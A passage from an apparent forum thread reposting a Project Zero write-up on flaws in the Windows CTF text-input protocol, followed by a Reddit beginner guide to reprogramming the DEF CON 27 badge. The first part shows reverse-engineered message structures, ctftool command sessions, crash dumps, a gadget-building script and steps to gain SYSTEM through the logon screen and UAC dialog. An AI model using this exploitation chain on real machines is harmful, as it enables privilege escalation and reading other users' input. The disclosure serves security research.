many. Understanding the CTF Protocol... 
A CTF monitor service is spawned for each new desktop and session, and creates an ALPC port called \BaseNamedObjects\msctf.server<DesktopName><SessionId>.

The ctf server ALPC port contains the desktop name and the session id.

When any process creates a window, the kernel invokes a callback, USER32!CtfHookProcWorker, that automatically loads the CTF client. The client connects to the ALPC port, and reports its HWND, thread and process id.

typedef struct _CTF_CONNECT_MSG {
    PORT_MESSAGE Header;
    DWORD ProcessId;
    DWORD ThreadId;
    DWORD TickCount;
    DWORD ClientFlags;
    union {
        UINT64 QuadWord;
        HWND WindowId;
    };
} CTF_CONNECT_MSG, *PCTF_CONNECT_MSG;

This is the initial handshake message clients send to connect to the CTF session. The protocol is entirely undocumented, and these structures were reverse engineered.

The server continuously waits for messages from clients, but clients only look for messages when notified via PostMessage(). This is the reason that clients call RegisterWindowMessage() on startup! Clients can send commands to the monitor, or ask the monitor to forward commands to other clients by specifying the destination thread id.

typedef struct _CTF_MSGBASE {
    PORT_MESSAGE Header;
    DWORD Message;
    DWORD SrcThreadId;
    DWORD DstThreadId;
    DWORD Result;
    union {
        struct _CTF_MSGBASE_PARAM_MARSHAL {
            DWORD ulNumParams;
            DWORD ulDataLength;
            UINT64 pData;
        };
        DWORD Params[3];
    };
} CTF_MSGBASE, *PCTF_MSGBASE;

Messages can be sent to any connected thread, or to the monitor itself by setting the destination to thread zero. Parameters can be appended, or if you only need some integers, you can include them in the message. There are dozens of commands that can be sent, many involve sending or receiving data or instantiating COM objects. Many commands require parameters, so the CTF protocol has a complex type marshaling and unmarshaling system.
typedef struct _CTF_MARSHAL_PARAM {
    DWORD Start;
    DWORD Size;
    DWORD TypeFlags;
    DWORD Reserved;
} CTF_MARSHAL_PARAM, *PCTF_MARSHAL_PARAM;

Marshalled parameters are appended to messages.

If you want to send marshalled data to an instantiated COM object, the monitor will “proxy” it for you. You simply prepend a PROXY_SIGNATURE structure that describes which COM object you want it forwarded to.

typedef struct _CTF_PROXY_SIGNATURE {
    GUID Interface;
    DWORD FunctionIndex;
    DWORD StubId;
    DWORD Timestamp;
    DWORD field_1C; // I've never seen these fields used
    DWORD field_20;
    DWORD field_24;
} CTF_PROXY_SIGNATURE, *PCTF_PROXY_SIGNATURE;

You can even call methods on COM objects. Suffice to say, CTF is vast and complex. The CTF system was most likely designed for LPC in Windows NT and bolted onto ALPC when it became available in Vista and later. The code is clearly dated, with many legacy design decisions. In fact, the earliest version of MSCTF I've been able to find was from the 2001 release of Office XP, which even supported Windows 98. It was later included with Windows XP as part of the base operating system. CTF has been part of Windows since XP, but ctftool only supports ALPC, which was introduced in Vista. In Windows Vista, Windows 7 and Windows 8, the monitor was run as a task inside taskhost.exe. ctftool supports Windows 7, and I verified all the bugs described in this document still exist.[3] In fact, the entire ctf system has changed very little since Vista. The monitor is a standalone process again in Windows 10, but the protocol has still barely changed.

Is there any attack surface?

Firstly, there is no access control whatsoever! Any application, any user - even sandboxed processes - can connect to any CTF session. Clients are expected to report their thread id, process id and HWND, but there is no authentication involved and you can simply lie.
Secondly, there is nothing stopping you pretending to be a CTF service and getting other applications - even privileged applications - to connect to you. Even when working as intended, CTF could allow escaping from sandboxes and escalating privileges. This convinced me that my time would be well spent reverse engineering the protocol. Sample output from my command line tool. This was a bigger job than I had anticipated, and after a few weeks I had built an interactive command-line CTF client called ctftool. To reach parts of the CTF protocol that looked dangerous, I even had to develop simple scripting capabilities with control flow, arithmetic and variables! Exploring CTF with ctftool... Using ctftool you can connect to your current session and view the connected clients. > .\ctftool.exe An interactive ctf exploration tool by @taviso. Type "help" for available commands. Most commands require a connection, see "help connect". ctf> connect The ctf server port is located at \BaseNamedObjects\msctf.serverDefault2 NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault2") => 0 Connected to CTF server@\BaseNamedObjects\msctf.serverDefault2, Handle 00000224 ctf> scan Client 0, Tid 5100 (Flags 0x08, Hwnd 000013EC, Pid 4416, explorer.exe) Client 1, Tid 5016 (Flags 0x08, Hwnd 00001398, Pid 4416, explorer.exe) Client 2, Tid 7624 (Flags 0x08, Hwnd 00001DC8, Pid 4416, explorer.exe) Client 3, Tid 4440 (Flags 0x0c, Hwnd 00001158, Pid 5776, SearchUI.exe) Client 4, Tid 7268 (Flags 0000, Hwnd 00001C64, Pid 7212, ctfmon.exe) Client 5, Tid 6556 (Flags 0x08, Hwnd 0000199C, Pid 7208, conhost.exe) Client 6, Tid 5360 (Flags 0x08, Hwnd 000014F0, Pid 5512, vmtoolsd.exe) Client 7, Tid 812 (Flags 0x08, Hwnd 0000032C, Pid 6760, OneDrive.exe) Client 8, Tid 6092 (Flags 0x0c, Hwnd 000017CC, Pid 7460, LockApp.exe) Client 9, Tid 6076 (Flags 0000, Hwnd 000017BC, Pid 5516, ctftool.exe) Not only can you send commands to the server, you can wait for a particular client to connect, and then ask the 
server to forward commands to it as well! Let's start a copy of notepad, and wait for it to connect to our CTF session... Connecting to another client on the same CTF session. Now we can ask notepad to instantiate certain COM objects by specifying the CLSID. If the operation is successful, it returns what's called a “stub”. That stub lets us interact with the instantiated object, such as invoking methods and passing it parameters. Let’s instantiate a ITfInputProcessorProfileMgr object. ctf> createstub 0 5 IID_ITfInputProcessorProfileMgr Command succeeded, stub created Dumping Marshal Parameter 3 (Base 012EA8F8, Type 0x106, Size 0x18, Offset 0x40) 000000: 4c e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c L..q(....*..[.C\ 000010: 01 00 00 00 bb ee b7 00 ........ Marshalled Value 3, COM {71C6E74C-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0xb7eebb That worked, and now we can refer to this object by its “stub id”. This object can do things like change the input method, enumerate available languages, and so on. Let's call ITfInputProcessorProfileMgr::GetActiveProfile, this method is documented so we know it takes two parameters: A GUID, and a buffer to store a TF_INPUTPROCESSORPROFILE. Ctftool can generate these parameters, then request notepad proxy them to the COM object. ctf> setarg 2 New Parameter Chain, Length 2 ctf> setarg 1 34745c63-b2f0-4784-8b67-5e12c8701a31 Dumping Marshal Parameter 0 (Base 012E8E90, Type 0x1, Size 0x10, Offset 0x20) Possibly a GUID, {34745C63-B2F0-4784-8B67-5E12C8701A31} ctf> # just generating a 0x48 byte buffer ctf> setarg 0x8006 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" Dumping Marshal Parameter 1 (Base 012E5010, Type 0x8006, Size 0x48, Offset 0x30) Marshalled Value 1, DATA ctf> callstub 0 0 10 Command succeeded. Parameter 1 has the output flag set. Dumping Marshal Parameter 1 (Base 012E5010, Type 0x8006, Size 0x48, Offset 0x20) 000000: 02 00 00 00 09 04 00 00 00 00 00 00 00 00 00 00 ................ 
000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000020: 00 00 00 00 00 00 00 00 63 5c 74 34 f0 b2 84 47 ........c\t4...G
000030: 8b 67 5e 12 c8 70 1a 31 00 00 00 00 09 04 09 04 .g^..p.1........
000040: 00 00 00 00 03 00 00 00 ........
Marshalled Value 1, DATA

You can see notepad filled in the buffer we passed it with data about the current profile.

Looking for bugs...

It will come as no surprise that this complex, obscure, legacy protocol is full of memory corruption vulnerabilities. Many of the COM objects simply trust you to marshal pointers across the ALPC port, and there is minimal bounds checking or integer overflow checking. Some commands require you to own the foreground window or have other similar restrictions, but as you can lie about your thread id, you can simply claim to be that window's owner and no proof is required.

It didn’t take long to notice that the command to invoke a method on an instantiated COM stub accepts an index into a table of methods. There is absolutely no validation of this index, effectively allowing you to jump through any function pointer in the program.

int __thiscall CStubITfCompartment::Invoke(CStubITfCompartment *this,
                                           unsigned int FunctionIndex,
                                           struct MsgBase **Msg)
{
  return CStubITfCompartment::_StubTbl[FunctionIndex](this, Msg);
}

Here FunctionIndex is an integer we control, and Msg is the CTF_MSGBASE we sent to the server. If we try calling a nonsense function index...

ctf> callstub 0 0 0x41414141

This happens in notepad...

(3248.2254): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSCTF!CStubITfInputProcessorProfileMgr::Invoke+0xc:
00007ff9`4b669c6c 498b04c1 mov rax,qword ptr [r9+rax*8] ds:00007ffb`5577e6e8=????????????????
0:000> r rax=0000000041414141 rbx=0000000000000000 rcx=0000025f170c36c0 rdx=000000d369fcf1f0 rsi=0000000080004005 rdi=000000d369fcf1f0 rip=00007ff94b669c6c rsp=000000d369fcec88 rbp=000000d369fcf2b0 r8=000000d369fcf1f0 r9=00007ff94b6ddce0 r10=00000fff296cd38c r11=0000000000011111 r12=0000025f170c3628 r13=0000025f170d80b0 r14=000000d369fcf268 r15=0000000000000000 iopl=0 nv up ei pl zr na po cy cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010247 MSCTF!CStubITfInputProcessorProfileMgr::Invoke+0xc: 00007ff9`4b669c6c 498b04c1 mov rax,qword ptr [r9+rax*8] ds:00007ffb`5577e6e8=???????????? ???? Note that ctf library catches all exceptions, so notepad doesn’t actually crash! This also means you get unlimited attempts at exploitation. This seems like a good first candidate for exploitation. Let’s find something to call... All of the major system programs and services shipping in Windows 10 use CFG, Control Flow Guard. In practice, CFG is a very weak mitigation. Ignoring the many known limitations, even the simplest Windows programs have hundreds of thousands of whitelisted indirect branch targets. Finding useful gadgets is significantly more tedious with CFG, but producing useful results is no less plausible than it was before. This bug effectively allows you to dereference an arbitrary function pointer somewhere within your address space. You can call it with two parameters, the this pointer, and a pointer to a pointer to a structure partly controlled (the ALPC PORT_MESSAGE). Not a very promising start! I decided to just call every possible index to see what happened. I was hoping for an exception that might have moved the registers and stack into something a bit more favourable. Using the Windows Subsystem for Linux, I used this bash command to keep spawning new notepads and logging the exceptions with cdb: $ while :; do cdb -xi ld -c 'g;r;u;dq@rcx;dq@rdx;kvn;q' notepad; done Then, I used ctftool to call every possible function index. 
This actually worked, and I found that at index 496 there is a pointer to MSCTF!CTipProxy::Reconvert, a function that moves RDX, RCX, RDI and R8 to just 200 bytes away from a buffer I control, and then jumps to a pointer I control.

0:000> dqs MSCTF!CStubIEnumTfInputProcessorProfiles::_StubTbl + 0n496*8 L1
00007ff9`4b6dec28 00007ff9`4b696440 MSCTF!CTipProxy::Reconvert

I can still only jump to CFG whitelisted branch targets, but this is a much more favourable program state for exploitation.

A note about ASLR...

The entire base system in Windows 10 uses ASLR, but image randomization on Windows is per-boot, not per-process. This means that we can reliably guess the location of code. Unfortunately, the stack is randomized per-process. If we want to use data from the stack we need to leak a pointer. It turns out that compromising the server is trivially easy, because as part of the CTF marshalling protocol, the monitor actually tells you where its stack is located ¯\_(ツ)_/¯.

Browsing what gadgets are available...

While the server will just tell you where its stack is, clients will not. This means that we either need to find an infoleak, or a write-what-where gadget so that we can move data somewhere we can predict, like the data section of an image. Once we have one of those, we can make fake objects and take over the process. I dumped all the whitelisted branch targets with dumpbin and cdb, and found some candidate gadgets. This process is mostly manual; I just use egrep to find displacement values that look relevant, then read any promising results. The only usable arbitrary write gadget I could find was part of msvcrt!_init_time, which is a whitelisted CFG indirect branch target. It’s a decrement on an arbitrary dword.
0:000> u msvcrt!_init_time+0x79
msvcrt!_init_time+0x79:
00007ff9`4b121db9 f0ff8860010000  lock dec dword ptr [rax+160h]
00007ff9`4b121dc0 48899f58010000  mov qword ptr [rdi+158h],rbx
00007ff9`4b121dc7 33c0            xor eax,eax
00007ff9`4b121dc9 488b5c2430      mov rbx,qword ptr [rsp+30h]
00007ff9`4b121dce 488b6c2438      mov rbp,qword ptr [rsp+38h]
00007ff9`4b121dd3 4883c420        add rsp,20h
00007ff9`4b121dd7 5f              pop rdi
00007ff9`4b121dd8 c3              ret

Trust me, I spent a lot of time looking for better options 🤣

This will work, it just means we have to call it over and over to generate the values we want! I added arithmetic and control flow to ctftool so that I can automate this. I have to keep decrementing bytes until they match the value I want; this is very laborious, but I was able to get it working. Here is a snippet of my ctftool language generating these calls.

# I need the first qword to be the address of my fake object, the -0x160 is to compensate for
# the displacement in the dec gadget. Then calculate (-(r1 >> n) & 0xff) to find out how many times
# we need to decrement it.
#
# We can't read the data, so we must be confident it's all zero for this to work.
#
# CFG is a very weak mitigation, but it sure does make you jump through some awkward hoops.
#
# These loops produce the address we want 1 byte at a time, so I need eight of them.
patch 0 0xa8 r0 8 -0x160
set r1 r0
shr r1 0
neg r1 r1
and r1 0xff
repeat r1 callstub 0 0 496
patch 0 0xa8 r0 8 -0x15f
set r1 r0
shr r1 8
neg r1 r1
sub r1 1
and r1 0xff
repeat r1 callstub 0 0 496
...

Generating fake objects in memory one decrement at a time...

Now that I can build fake objects, I was able to bounce around through various gadgets to set up my registers and finally return into LoadLibrary(). This means I can compromise any CTF client, even notepad! Am I the first person to pop a shell in notepad? 🤣

Making it matter...

Now that I can compromise any CTF client, how do I find something useful to compromise?
There is no access control in CTF, so you could connect to another user's active session and take over any application, or wait for an Administrator to login and compromise their session. However, there is a better option: If we use USER32!LockWorkstation we can switch to the privileged Winlogon desktop that is already running as SYSTEM! It's true, there really is a CTF session for the login screen... PS> ctftool.exe An interactive ctf exploration tool by @taviso. Type "help" for available commands. Most commands require a connection, see "help connect". ctf> help lock Lock the workstation, switch to Winlogon desktop. Usage: lock Unprivileged users can switch to the privileged Winlogon desktop using USER32!LockWorkstation. After executing this, a SYSTEM privileged ctfmon will spawn. Most commands require a connection, see "help connect". ctf> lock ctf> connect Winlogon sid The ctf server port is located at \BaseNamedObjects\msctf.serverWinlogon3 NtAlpcConnectPort("\BaseNamedObjects\msctf.serverWinlogon3") => 0 Connected to CTF server@\BaseNamedObjects\msctf.serverWinlogon3, Handle 00000240 ctf> scan Client 0, Tid 2716 (Flags 0000, Hwnd 00000A9C, Pid 2152, ctftool.exe) Client 1, Tid 9572 (Flags 0x1000000c, Hwnd 00002564, Pid 9484, LogonUI.exe) Client 2, Tid 9868 (Flags 0x10000008, Hwnd 0000268C, Pid 9852, TabTip.exe) The Windows logon interface is a CTF client, so we can compromise it and get SYSTEM privileges. Here is a video of the attack in action. Watch a video of an unprivileged user getting SYSTEM via CTF. You can read more notes on the exploitation process here. The "TIP" of the iceberg... The memory corruption flaws in the CTF protocol can be exploited in a default configuration, regardless of region or language settings. This doesn't even begin to scratch the surface of potential attacks for users that rely on out-of-process TIPs, Text Input Processors. 
If you have Chinese (Simplified, Traditional, and others), Japanese, Korean or many other[4] languages installed, then you have a language with extended capabilities. Any CTF client can select this language for another client, just having it installed is enough, it doesn't have to be enabled or in use. This allows any CTF client to read and write the text of any window, from any other session. Using ctftool we can, for example, replace the text in notepad with our own text. ctf> connect The ctf server port is located at \BaseNamedObjects\msctf.serverDefault1 NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault1") => 0 Connected to CTF server@\BaseNamedObjects\msctf.serverDefault1, Handle 000001E8 ctf> wait notepad.exe Found new client notepad.exe, DefaultThread now 3468 ctf> setarg 7 New Parameter Chain, Length 7 ctf> setarg 0x1 0100000001000000 ctf> setarg 0x1 0000000000000000 Dumping Marshal Parameter 1 (Base 0120F6B8, Type 0x1, Size 0x8, Offset 0x78) 000000: 00 00 00 00 00 00 00 00 ........ Marshalled Value 1, DATA ctf> setarg 0x201 0 Dumping Marshal Parameter 2 (Base 0120F6B8, Type 0x201, Size 0x8, Offset 0x80) 000000: 00 00 00 00 00 00 00 00 ........ Marshalled Value 2, INT 0000000000000000 ctf> setarg 0x201 11 Dumping Marshal Parameter 3 (Base 0120F6B8, Type 0x201, Size 0x8, Offset 0x88) 000000: 0b 00 00 00 00 00 00 00 ........ Marshalled Value 3, INT 000000000000000b ctf> setarg 0x201 16 Dumping Marshal Parameter 4 (Base 0120F6B8, Type 0x201, Size 0x8, Offset 0x90) 000000: 10 00 00 00 00 00 00 00 ........ Marshalled Value 4, INT 0000000000000010 ctf> setarg 0x25 L"TestSetRangeText" Dumping Marshal Parameter 5 (Base 0121C680, Type 0x25, Size 0x20, Offset 0x98) 000000: 54 00 65 00 73 00 74 00 53 00 65 00 74 00 52 00 T.e.s.t.S.e.t.R. 000010: 61 00 6e 00 67 00 65 00 54 00 65 00 78 00 74 00 a.n.g.e.T.e.x.t. 
Marshalled Value 5, DATA ctf> setarg 0x201 0x77777777 Dumping Marshal Parameter 6 (Base 0121E178, Type 0x201, Size 0x8, Offset 0xb8) 000000: 77 77 77 77 00 00 00 00 wwww.... Marshalled Value 6, INT 0000000077777777 ctf> call 0 MSG_REQUESTEDITSESSION 1 1 0 Result: 0 ctf> marshal 0 MSG_SETRANGETEXT Result: 0, use `getarg` if you want to examine data Using CTF to change and read the contents of windows. The obvious attack is an unprivileged user injecting commands into an Administrator's console session, or reading passwords as users log in. Even sandboxed AppContainer processes can perform the same attack. Another interesting attack is taking control of the UAC consent dialog, which runs as NT AUTHORITY\SYSTEM. An unprivileged standard user can cause consent.exe to spawn using the "runas" verb with ShellExecute(), then simply become SYSTEM. The UAC consent dialog is a CTF client that runs as SYSTEM. For screenshot purposes I lowered the UAC level here, but it works at any level. By default, it uses the "secure" desktop.... but there is no access control whichever level you choose ¯\_(ツ)_/¯ PS> handle.exe -nobanner -a -p "consent.exe" msctf consent.exe pid: 6844 type: ALPC Port 3D0: \BaseNamedObjects\msctf.serverWinlogon1 consent.exe pid: 6844 type: Mutant 3F0: \Sessions\1\BaseNamedObjects\MSCTF.CtfMonit orInstMutexWinlogon1 consent.exe pid: 6844 type: Event 3F4: \Sessions\1\BaseNamedObjects\MSCTF.CtfMonit orInitialized.Winlogon1S-1-5-18 consent.exe pid: 6844 type: Event 3F8: \Sessions\1\BaseNamedObjects\MSCTF.CtfDeact ivated.Winlogon1S-1-5-18 consent.exe pid: 6844 type: Event 3FC: \Sessions\1\BaseNamedObjects\MSCTF.CtfActiv ated.Winlogon1S-1-5-18 consent.exe pid: 6844 type: Mutant 450: \Sessions\1\BaseNamedObjects\MSCTF.Asm.Mute xWinlogon1 consent.exe pid: 6844 type: Mutant 454: \Sessions\1\BaseNamedObjects\MSCTF.CtfServe rMutexWinlogon1 I've implemented this attack in ctftool, follow the steps here to try it. So what does it all mean? 
Even without bugs, the CTF protocol allows applications to exchange input and read each other's content. However, there are a lot of protocol bugs that allow taking complete control of almost any other application. It will be interesting to see how Microsoft decides to modernize the protocol. If you want to investigate further, I’m releasing the tool I developed for this project. https://github.com/taviso/ctftool

Conclusion

It took a lot of effort and research to reach the point that I could understand enough of CTF to realize it’s broken. These are the kind of hidden attack surfaces where bugs last for years. It turns out it was possible to reach across sessions and violate NT security boundaries for nearly twenty years, and nobody noticed. Now that there is tooling available, it will be harder for these bugs to hide going forward.

Bonus... can you pop calc in calc?

In Windows 10, Calculator uses AppContainer isolation, just like Microsoft Edge. However, the kernel still forces AppContainer processes to join the ctf session.

ctf> scan
Client 0, Tid 2880 (Flags 0x08, Hwnd 00000B40, Pid 3048, explorer.exe)
Client 1, Tid 8560 (Flags 0x0c, Hwnd 00002170, Pid 8492, SearchUI.exe)
Client 2, Tid 11880 (Flags 0x0c, Hwnd 00002E68, Pid 14776, Calculator.exe)
Client 3, Tid 1692 (Flags 0x0c, Hwnd 0000069C, Pid 15000, MicrosoftEdge.exe)
Client 4, Tid 724 (Flags 0x0c, Hwnd 00001C38, Pid 2752, MicrosoftEdgeCP.exe)

This means you can compromise Calculator, and from there compromise any other CTF client... even non-AppContainer clients like explorer. On Windows 8 and earlier, compromising calc is as simple as any other CTF client. So yes, you can pop calc in calc 😃

[1] Via twitter.

[2] I can’t figure out what CTF stands for; it’s not explained in any header files, documentation, resources, sdk samples, strings or symbol names. My best guess is it's from Hungarian notation, i.e. CTextFramework.

[3] Adding support for Windows Vista would be trivial.
XP support, while possible, would be more effort. [4] This list is not exhaustive, but presumably you know if you write in a language that uses an IME. Posted by taviso at 7:01 AM Sursa: https://googleprojectzero.blogspot.com/2019/08/down-rabbit-hole.html
  18. Posted by u/FakeSquare 5 days ago Defcon 27 Badge Hacking for Beginners I'm the "NXP guy" mentioned in the badge talk, and got to meet and help a lot of yall in the Hardware Hacking village during my first (but definitely not last) Defcon. I'd been interested in going since I was a teenager in the 90s reading about it on Slashdot, and it was really awesome getting to meet so many people so excited about embedded systems. It was definitely the most fun and fascinating conference I've ever gone to in my life. If you got leveled up by a blue magic badge, that was me. I can't take any credit at all for the badge as Joe Grand did all the work. I only first saw the badge 2 days before Defcon started, so I had a lot of fun hacking it too and trying to figure out its secrets and how to make it into a chameleon badge just like everyone else. There's an updated version of the badge talk that Joe posted on his website. If you didn't make it to his session during DEFCON I highly recommend going through it, the process of sourcing the gems was insane: http://www.grandideastudio.com/wp-content/uploads/dc27_bdg_slides.pdf Full schematics and source code and more can now be found at: http://www.grandideastudio.com/defcon-27-badge/ So I told people in the hardware hacking village I'd make a post to cover all the many questions I got over the conference and walk through step by step how to program their badge for someone that has no embedded experience at all. I'll edit this for any new questions that come up and will be writing up a software guide shortly for walking through the code. There's two main NXP devices on the badge: KL27- MKL27Z64VDA4 - 48Mhz ARM Cortex M0+ microcontroller w/ 64KB flash (Datasheet and Reference Manual) NXH2261UK- Near Field Magnetic Induction (NFMI) chip for the wireless communication. Has a range on the badge of about 6 inches (15cm), but the technology can work a bit further. 
It's often found in high end headphones because BLE waves are disrupted by your head but these waves aren't. Also less power consumption. Overview Pinout Using the serial port: There's a serial interface which prints out helpful information and there's some "secrets" available if you have a completely leveled up badge. It'll also be really helpful if you're writing new code to hack your badge for printf debugging. Note that you cannot program the board by default over the serial port. This particular chip doesn't support that, though some of our other chips do. It of course would be possible to write a serial bootloader for it, but that's definitely not beginner level. You'll need two pieces of hardware: Header Pins Serial-to-USB converter Header Pin: You can solder on a header to the PCB footprint. Because of the quartz, the leads would need to be flat on the PCB. A Harwin M20-8770442 will fit the footprint and is what was provided at the soldering village and what you see in the photos below. You could also try creating your own header. Serial to USB Converter: Since almost no computer today comes with a serial port, a serial to USB converter dongle is needed. It'll often have four pins: GND, Power, TX, and RX. The DEFCON badge runs at 1.8V, but the chip itself is rated up to 3.6V, so a 3.3V dongle can be used *as long as you do not connect the power pin on the serial header*. You only need to connect GND, RX, and TX. In a production design you would not want an IO voltage above VCC, but for hacking purposes it'll work, and I've used it all week without an issue on multiple boards. There's a lot of options. Here's a 1.8V one if you want to be extra cautious or a 3.3V one that already comes with connectors for $8. Anything that transmits at 1.8V or 3.3V will work if you already have one, but again, don't connect the power pin. Software: You'll need to install a serial terminal program like TeraTerm or Putty. 
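If you'd rather script the badge console than use a GUI terminal, the same connection can be opened from a few lines of Python. This is a minimal sketch using pyserial (my own addition — the post itself only mentions TeraTerm/Putty; the port name "COM3" is just an example), matching the badge's settings of 115200 baud, 8 data bits, no parity, 1 stop bit:

```python
# Badge serial console settings from the post: 115200 baud, 8N1.
BADGE_SERIAL_SETTINGS = {
    "baudrate": 115200,
    "bytesize": 8,    # 8 data bits
    "parity": "N",    # no parity
    "stopbits": 1,    # 1 stop bit
}

def open_badge_console(port="COM3"):
    """Open the badge's serial console. Requires pyserial (pip install pyserial)."""
    import serial  # imported lazily so the settings above are usable without pyserial
    return serial.Serial(port=port, timeout=1, **BADGE_SERIAL_SETTINGS)

# Usage (with the dongle wired up as described below — GND/TX/RX only, no power pin):
#   with open_badge_console("COM3") as console:
#       console.write(b"?\n")   # ask the badge for its menu
#       print(console.read(512).decode(errors="replace"))
```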
There's also a built-in terminal program in MCUXpresso IDE (see next section) on the "Terminal" tab.

1) Plug the USB converter dongle into your computer and it should enumerate as a serial COM port.
2) Connect the GND line on the dongle to GND on the header.
3) Connect the TX pin on the dongle to the RX pin on the header.
4) Connect the RX pin on the dongle to the TX pin on the header (it is not RX to RX as you might expect; I spent 2 whole days tearing my hair out over that during my robotics project in college).
5) DO NOT CONNECT THE POWER PIN.

Should look like the following when finished

Serial port converter connected

6) In your serial terminal program, connect to the COM port your dongle enumerated as
7) Find the serial port settings menu (in TeraTerm it's in Setup->Serial Port from the menu bar) and set the baud rate to 115200. The other settings should not need to be changed (8 data bits, no parity, 1 stop bit).
8) In the terminal, press enter. You should get a > prompt
9) In the terminal, press the '?' key on your keyboard, and hit enter, you'll see the menu.
10) Note that the keyboard key you press won't show up in the terminal, but just press Enter and then the command will be run
11) Hit Ctrl+x to exit interactive mode and turn back on the radio.
12) When not in interactive mode, the terminal will display the packets that it received from any badge you bring close to it. This is how the badge reader in the chill out room worked.

Reprogramming Your Badge:

Hardware: There are two pieces of hardware needed:

Programmer/debugger
Programming cable

Programmer/Debugger: Most any ARM Cortex-M debug programmer can be used, as the KL27 chip has an ARM Cortex-M0+ core. I'd recommend the LPC-Link2 as it's only $20 and can be bought directly from NXP or from most distributors (like Mouser or Digikey). Search for "OM13054". But you could also use a J-Link, PEMicro, or others if you already have an ARM programmer.
Cable: The DEFCON badge has the footprint for a Tag Connect TC2050-IDC-NL-050-ALL. Because this cable is meant for manufacturing programming and not day-to-day debugging, if you plan on stepping through code, you'll also want to pop off the quartz front and get some retainer clips to keep the programmer connected to the board. If you simply want to reprogram the board, you can just snip off the 3 long guide clips, and press the cable against the PCB while holding your hand steady for the ~5 seconds it takes to flash it each time. Alternatively, if you already have a JTAG/SWD cable and have soldering skills, you can use some fine gauge wire and hack up your own converter to your board like /u/videlen did with some true hacker soldering. However, as /u/int23h pointed out, because it's using Single Wire Debug (SWD) you really only need to solder 2 of the pins, SWDIO and SWDCLK. nRESET is also recommended as it'll let you take control of the device if it's in sleep mode (which it is most of the time). Power (which is needed so the programmer knows what voltage to send the signals at) and GND you can get from the serial header.

Programming pinout

Software

There are three pieces of software you'll need:

Compiler
MCUXpresso SDK for the KL27
Badge source code

Compiler:
Recommended Option: Latest version of MCUXpresso IDE - available for Windows, Mac, and Linux. Requires registration but it's instant.
Second Option: Download older version of MCUXpresso IDE for Windows from the DEFCON media server
Third Option: If you use the latest SDK, you can use ARM-GCC, IAR, or Keil tool chains as well.

MCUXpresso SDK:
Recommended Option: Download latest SDK version for KL27 - includes projects for MCUXpresso IDE, ARM-GCC, IAR, and Keil compilers
Other option: Download the older 2.4.2 SDK version on the DEFCON server which only has MCUXpresso IDE compiler support.
Badge Source:
Recommended Option: Download the zip off Joe Grand's website: http://www.grandideastudio.com/wp-content/uploads/dc27_bdg_source.zip
Other option: Download from the DEFCON media server. However the .project and .cproject files do not show up by default, so you must make sure to explicitly download them as well and put them in the main firmware folder (at the same level as the .mex file). These are the exact same files as in the zip.

wget -r -np -R "index.html*" https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20badge/Firmware/
wget https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20badge/Firmware/.cproject
wget https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20badge/Firmware/.project

Getting Started with MCUXpresso IDE:

1) Open up MCUXpresso IDE. When it asks for a workspace directory to use, select (or make) a new empty directory that is in a different location than where you downloaded the firmware source.
2) Drag and drop the SDK .zip file from your file system into the MCUXpresso IDE "Installed SDKs" window. It'll pop up a dialog box asking if you're sure you want to import it into the IDE; click on OK. This is how the compiler learns about the KL27 device and the flash algorithms.
3) Drag and drop the badge firmware folder from a file explorer window into the MCUXpresso IDE "Project Explorer" window
4) In the Quickstart panel hit Build
5) In the Console tab, you should see the message that it compiled successfully
6) In the Quickstart panel hit Debug. If you're not using a LPC-Link2 for programming, you'll need to hold Shift when clicking this the first time so it'll rescan for your debugger. If using the latest MCUXpresso IDE, you may see a dialog box that the launch configuration needs to be updated the first time you do this. Click on "Yes"
7) A dialog box will come up confirming your debug probe. Don't hit OK yet.
8) Connect the TagConnect cable to the J7 header on the LPC-Link2.
Then connect the cable to the badge and press to make a good connection. Make sure the alignment pins match up with the alignment holes on the PCB, and that pin 1 (the red stripe) matches the photo below. You may hear the badge beep, as it's being reset. 9) Then hit OK in the dialog box to start programming. Make sure to keep the probe held there until the programming is finished - about 5 seconds. 10) You should see it program successfully and hear the board beep as it reboots. Programming Troubleshooting/Tips: If you're not using a LPC Link2, hold down the Shift key when you hit the Debug button, and it'll re-search for new probes. Also make sure your probe/settings are setup for SWD mode and not JTAG mode. If you have the programming cable not lined up with the pads, you'll see an error about wire not connected. Re-align your probe and try again. Also you must have power from the battery as the MCU needs to be turned on while programming. You can hit the GUI flash programmer at the top for a quicker download experience since it won't load the debug view. Useful if just flashing the device without wanting to step through code. Finally, some of the game state variables are stored in the non-volatile internal flash, and may not automatically get erased when reprogramming the firmware as the programmer doesn't realize that area of flash memory is being used, and so to save time, the programmer doesn't bother to erase that area. You can force a complete erase of the flash to wipe all the game variables by setting the mass erase option. Double click on the dc27_badge LinkServer Debug.launch file which contains the debug settings, and go to GUI Flash Tool->Program and set Program (mass erase first). Getting Started with ARM-GCC: To make this easier, you'll need to download the latest SDK from the NXP website first. Follow the instructions in Section 6 of the MCUXpresso SDK User Guide for how to setup the environment and test it out on Hello World. 
You can then use that project for copying the badge source code into. I'm sure someone can put together a Makefile for the badge specifically. See this series of blog posts on how to use the SDK (compiling/debugging) with arm-gcc in Linux.

What if the badge isn't working:

First thing to try is power cycling the badge by gently prying the battery out (with a butter knife or something to prevent the battery holder from coming loose) and putting it back in. A couple of things might happen:

If nothing at all happens, your battery might be dead. Try replacing the battery. It's a CR2032 coin cell.
If nothing at all happens still, the battery holder might be loose. Use a multimeter to measure the voltage between the outer pads (GND and VCC) on the serial header; it should read 1.8V. If it does not, check the battery holder.
If you hear beeps, all 6 LEDs light up, and then 4 LEDs (2 on each side) flash in sync a few times, it means there was an issue communicating with the NFMI device. This could be due to a loose solder joint on one of the chips or the I2C pull-up resistors (SCL and SDA on the pinout image). You could also do a reflow if you have the equipment, but it may not be fixable. You could also check whether there's any I2C communication on those SCL/SDA pins.
